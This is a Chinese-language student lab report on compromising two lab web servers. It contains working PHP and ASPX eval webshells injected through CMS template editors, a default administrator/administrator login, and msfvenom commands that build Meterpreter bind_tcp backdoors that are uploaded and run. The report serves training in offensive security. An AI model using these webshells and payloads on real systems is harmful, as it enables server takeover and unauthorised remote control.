实验原理:在Kali linux中生成一个被控端,这个远程控制是正向的,在攻击机中执行了这个远程控制被控端之后,会在自己的主机上打开一个端口,然后等待靶机的连接,此时的攻击机并不会通知靶机。(如果是反向远程控制被控端就会主动通知)
一、实验目的
1、 学会使用主流的远控软件,比如msf.学会使用webshell管理工具对一句话木马进行连接.
二、实验任务
1、进入web系统后台后写入一句话木马,然后用中国蚁剑进行连接
2、用中国蚁剑进行连接后,使用msf进行远控
三、实验环境
四、实验过程和实验结果
(一)广诚在线视频 10.100.0.99
1.御剑扫描
2.发现敏感文件,使用火狐浏览器修复文字编码,修复后如图:
3.去登录后台
4.成功进入后台
5.找到工具--模板管理--编辑
6.这里在首页,写入一句话木马<?php @eval($_POST['x']);?>
7.然后使用中国蚁剑,右键然后添加数据,URL对应木马得地址,连接密码就是POST提交的参数
8.成功添加
9.然后制作msf正向木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=13777 -f elf > linuxshell
10.生成后找到那个木马,然后使用中国蚁剑上传msf正向木马,上传成功后运行
12.然后用msf连接,成功连接
14.这里不是最高权限
(二)广诚小学 10.100.0.49
1.老规矩进入后台
administrator
administrator
2.找到专题管理,编辑:
记得提交
<%
System. IO.StreamWriter ow=new System. IO.StreamWriter(Server.MapPath("xx.aspx"),false);
ow.Write("<%@ Page Language=\"Jscript\"%\><%eval(Request. Item[\"chopper\"],\"unsafe\");%\>");
ow.Close();
%>
3.然后点击2010专题111,跳转之后:
4.中国蚁剑进行连接
5.制作msf正向木马
msfvenom -p windows/meterpreter/bind_tcp LPORT=8989 -f exe -o flash.exe
6上传木马到 C:/WINDOWS/Temp/ 目录下,切换目录,运行木马
7.运行后成功拿到权限
五、实验总结
总结:通过本次实验,我掌握了如何用中国蚁剑进行连接靶机后,利用msfvenom命令生成远程控制的被控端;理解了msfvenom命令中各参数的应用,如:-p 指定需要使用的payload(攻击荷载)。-f 指定输出格式,exe、elf...等。-o 输出的payload文件的保存位置。同时还明白了怎么在kali linux启动主控端,怎么监听来自感染了被控端的通信,通过实践促进了前面理论知识的吸收,收获颇丰。